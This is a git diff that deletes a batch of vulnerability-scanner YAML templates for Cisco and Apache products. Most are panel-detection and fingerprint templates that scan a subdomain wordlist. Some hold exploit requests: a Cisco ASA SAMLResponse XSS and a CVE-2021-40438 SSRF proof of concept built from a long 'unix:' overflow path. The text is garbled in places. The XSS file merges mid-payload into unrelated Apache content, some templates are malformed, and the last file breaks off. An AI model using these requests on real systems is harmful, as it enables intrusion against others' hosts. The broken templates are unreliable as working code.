- favicon_hash: []
diff --git a/tmp/cisco/cisco-meraki-exposure-945.yaml b/tmp/cisco/cisco-meraki-exposure-945.yaml
deleted file mode 100644
index aa0a9903d1..0000000000
--- a/tmp/cisco/cisco-meraki-exposure-945.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: cisco-meraki-exposure
-
-info:
- name: Cisco Meraki cloud & security Appliances Information Disclosure
- author: dhiyaneshDK,r3naissance
- severity: info
- reference: https://www.exploit-db.com/ghdb/6708
- tags: panel,cisco,meraki,disclosure
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /#connection HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Your client connection'
- - 'This security appliance is directly connected to a local network'
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-meraki-workflow.yaml b/tmp/cisco/cisco-meraki-workflow.yaml
deleted file mode 100644
index 2ae9af5428..0000000000
--- a/tmp/cisco/cisco-meraki-workflow.yaml
+++ /dev/null
@@ -1,13 +0,0 @@
-id: cisco-meraki-workflow
-
-info:
- name: Cisco Meraki Security Checks
- author: daffainfo
- description: A simple workflow that runs all Cisco Meraki related nuclei templates on a given target.
-
-workflows:
- - template: technologies/favicon-detect.yaml
- matchers:
- - name: meraki
- subtemplates:
- - tags: meraki
\ No newline at end of file
diff --git a/tmp/cisco/cisco-network-config.yaml b/tmp/cisco/cisco-network-config.yaml
deleted file mode 100644
index 6e55a27275..0000000000
--- a/tmp/cisco/cisco-network-config.yaml
+++ /dev/null
@@ -1,12 +0,0 @@
-id: cisco-network-config
-
-name: Cisco System Network Configuration Exposure
-severity: low
-
-requests:
- - method: GET
- paths:
- - "HOSTNAME/CGI/Java/Serviceability?adapter=device.statistics.configuration"
-
- patterns:
- - "Network Configuration"
diff --git a/tmp/cisco/cisco-nexus-data-broker.yaml b/tmp/cisco/cisco-nexus-data-broker.yaml
deleted file mode 100644
index 2864f0f018..0000000000
--- a/tmp/cisco/cisco-nexus-data-broker.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: cisco-nexus-data-broker
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - window.location.href = '/monitor';
- favicon_hash: []
diff --git a/tmp/cisco/cisco-prime-infrastructure-953.yaml b/tmp/cisco/cisco-prime-infrastructure-953.yaml
deleted file mode 100644
index 98edfcdedc..0000000000
--- a/tmp/cisco/cisco-prime-infrastructure-953.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: cisco-prime-infrastructure
-
-info:
- name: Cisco Prime Infrastructure
- author: dhiyaneshDk
- severity: info
- metadata:
- shodan-query: 'http.title:"prime infrastructure"'
- tags: panel,cisco
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /webacs/pages/common/login.jsp HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'productName = "Prime Infrastructure"'
- - "Cisco "
-
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-prime-network-registrar.yaml b/tmp/cisco/cisco-prime-network-registrar.yaml
deleted file mode 100644
index 2da97c6f64..0000000000
--- a/tmp/cisco/cisco-prime-network-registrar.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: cisco-prime-network-registrar
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - productname="network registrar
- favicon_hash: []
diff --git a/tmp/cisco/cisco-sd-wan-956.yaml b/tmp/cisco/cisco-sd-wan-956.yaml
deleted file mode 100644
index 5a1bb3ffad..0000000000
--- a/tmp/cisco/cisco-sd-wan-956.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: cisco-sd-wan
-
-info:
- name: Cisco SD-WAN panel
- author: z3bd
- severity: info
- reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj
- tags: panel,cisco
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /login HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
-
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - "SD-Wan Center"
- part: body
\ No newline at end of file
diff --git a/tmp/cisco/cisco-secure-cn-959.yaml b/tmp/cisco/cisco-secure-cn-959.yaml
deleted file mode 100644
index 52454fa5e0..0000000000
--- a/tmp/cisco/cisco-secure-cn-959.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: cisco-secure-cn
-
-info:
- name: Cisco Secure CN
- author: dhiyaneshDk
- severity: info
- tags: panel,cisco
- metadata:
- shodan-query: 'http.title:"Cisco Secure CN"'
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /login HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
Cisco Secure CN"
-
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-secure-desktop-961.yaml b/tmp/cisco/cisco-secure-desktop-961.yaml
deleted file mode 100644
index 3d939fde12..0000000000
--- a/tmp/cisco/cisco-secure-desktop-961.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: cisco-secure-desktop
-
-info:
- name: Cisco Secure Desktop
- author: pdteam
- severity: info
- tags: cisco,panel
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /CACHE/sdesktop/install/start.htm HTTP/1.1
- Host: {{Subdomains}}
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "
Installation"
- - "WebLaunch"
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-security-details-964.yaml b/tmp/cisco/cisco-security-details-964.yaml
deleted file mode 100644
index 444e2a2c8c..0000000000
--- a/tmp/cisco/cisco-security-details-964.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: cisco-security-details
-
-info:
- name: Cisco Meraki cloud & Security Appliance details
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6708
- tags: panel,cisco
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
-
- attack: sniper
- threads: 100
- raw:
- - |+
- GET /#connection HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
-
- unsafe: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Your client connection'
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-sendgrid-966.yaml b/tmp/cisco/cisco-sendgrid-966.yaml
deleted file mode 100644
index 8d658b0f76..0000000000
--- a/tmp/cisco/cisco-sendgrid-966.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: cisco-sendgrid
-
-info:
- name: Cisco ServiceGrid
- author: dhiyaneshDK
- severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Cisco+ServiceGrid%22
- tags: panel,cisco
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /pages/sdcall/Login.jsp HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - '(?m)^
Cisco ServiceGrid (.*)<\/title>$'
-
- - type: status
- status:
- - 200
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '<div class="top\-margin">Version ([0-9.]+)<\/div>'
diff --git a/tmp/cisco/cisco-ssl-vpn.yaml b/tmp/cisco/cisco-ssl-vpn.yaml
deleted file mode 100644
index f11de10ba6..0000000000
--- a/tmp/cisco/cisco-ssl-vpn.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: cisco-ssl-vpn
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers:
- Set-Cookie: webvpncontext=
- keyword: []
- favicon_hash: []
diff --git a/tmp/cisco/cisco-systems-login-974.yaml b/tmp/cisco/cisco-systems-login-974.yaml
deleted file mode 100644
index f7b7d28f72..0000000000
--- a/tmp/cisco/cisco-systems-login-974.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: cisco-systems-login
-
-info:
- name: Cisco Systems Login
- author: dhiyaneshDk
- severity: info
- tags: panel,cisco
- metadata:
- shodan-query: 'http.title:"Cisco Systems Login"'
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET / HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "<TITLE>Cisco Systems Login"
-
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-telepresence-977.yaml b/tmp/cisco/cisco-telepresence-977.yaml
deleted file mode 100644
index 775cc618b4..0000000000
--- a/tmp/cisco/cisco-telepresence-977.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: cisco-telepresence
-
-info:
- name: Cisco Telepresence
- author: dhiyaneshDk
- severity: info
- tags: panel,cisco
- metadata:
- shodan-query: 'http.title:"Cisco Telepresence"'
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- GET /login.html HTTP/1.1
- Host: {{Subdomains}}
- User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept-Encoding: gzip, deflate
- Accept: */*
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "
Cisco TelePresence MCU - login:"
-
- - type: status
- status:
- - 200
diff --git a/tmp/cisco/cisco-ucm.yaml b/tmp/cisco/cisco-ucm.yaml
deleted file mode 100644
index 2a3f90c428..0000000000
--- a/tmp/cisco/cisco-ucm.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: cisco-ucm
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - /ccmadmin/
- favicon_hash: []
diff --git a/tmp/cisco/cisco-ucs-director.yaml b/tmp/cisco/cisco-ucs-director.yaml
deleted file mode 100644
index 4dbd5aa6b3..0000000000
--- a/tmp/cisco/cisco-ucs-director.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: cisco-ucs-director
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - cisco ucs director
- favicon_hash: []
diff --git a/tmp/cisco/cisco-webex.yaml b/tmp/cisco/cisco-webex.yaml
deleted file mode 100644
index 398ea4e5c8..0000000000
--- a/tmp/cisco/cisco-webex.yaml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: cisco-webex
-priority: 3
-nuclei_tags:
- - []
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers: {}
- keyword:
- - alt="cisco webex meetings server"
- favicon_hash: []
diff --git a/tmp/cisco/ciscoasaxss.yaml b/tmp/cisco/ciscoasaxss.yaml
deleted file mode 100644
index 476f238696..0000000000
--- a/tmp/cisco/ciscoasaxss.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: Cisco ASA XSS
-info:
- name: Cisco ASA XSS with vulnerable parameter SAMLResponse
- author: nithissh
- severity: medium
- tags: xss,cisco
-requests:
- - raw:
- - |
- POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
- Host: {{Hostname}}
- Content-Length: 43
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- SAMLResponse=">
the apache
- haus
- favicon_hash: []
diff --git a/tmp/apache/apache-http.yaml b/tmp/apache/apache-http.yaml
deleted file mode 100644
index b51a780e8e..0000000000
--- a/tmp/apache/apache-http.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: apache-http
-priority: 3
-nuclei_tags:
- - - apache
- - mod-proxy
-fingerprint:
- - path: /
- request_method: get
- request_headers: {}
- request_data: ''
- status_code: 0
- headers:
- server: Apache
- keyword: []
- favicon_hash: []
diff --git a/tmp/apache/apache-httpd-conf-disclosure.yaml b/tmp/apache/apache-httpd-conf-disclosure.yaml
deleted file mode 100644
index 984050264e..0000000000
--- a/tmp/apache/apache-httpd-conf-disclosure.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-info:
- id: apache-httpd-conf-disclosure
- name: Apache httpd.conf Exposure - Detect
- author: OpenAI
- description: Template to detect Apache httpd.conf configuration file exposure
- severity: Medium
- classification:
- country: any
- tags:
- - apache
- - httpd.conf
- - config file
- - exposure
-
- requests:
- method: GET
- path:
- - "/etc/httpd/conf/httpd.conf"
- - "/etc/apache2/httpd.conf"
-
- matchers:
- - pattern: 'ServerAdmin\s+(.+)'
- type: body
- - pattern: 'DocumentRoot\s+(.+)'
- type: body
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/apache/apache-httpd-conf-exposure.yml b/tmp/apache/apache-httpd-conf-exposure.yml
deleted file mode 100644
index b5c8354e2f..0000000000
--- a/tmp/apache/apache-httpd-conf-exposure.yml
+++ /dev/null
@@ -1,30 +0,0 @@
-info:
- id: apache-httpd-conf-exposure
- name: Apache httpd.conf Exposure - Detect
- author: OpenAI
- description: Template to detect Apache httpd.conf file exposure
- severity: Medium
- classification:
- country: any
- tags:
- - apache
- - httpd.conf
- - config file
- - exposure
-
- requests:
- - method: GET
- path:
- - "/etc/apache2/httpd.conf"
- - "/etc/httpd/httpd.conf"
-
- matchers:
- - pattern: 'ServerAdmin\s+\w+'
- type: body
- - pattern: 'DocumentRoot\s+[\w\/\.\-]+'
- type: body
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/apache/apache-httpd-cve-2021-40438-ssrf.yaml b/tmp/apache/apache-httpd-cve-2021-40438-ssrf.yaml
deleted file mode 100644
index 826d4f9f42..0000000000
--- a/tmp/apache/apache-httpd-cve-2021-40438-ssrf.yaml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
- follow_redirects: false
- expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com/search/error.html"
-expression: r0()
-detail:
- author: Jarcis-cy(https://github.com/Jarcis-cy)
- links:
- - https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
diff --git a/tmp/apache/apache-httpd-cve-2021-40438-ssrf.yml b/tmp/apache/apache-httpd-cve-2021-40438-ssrf.yml
deleted file mode 100644
index 814d29edc0..0000000000
--- a/tmp/apache/apache-httpd-cve-2021-40438-ssrf.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA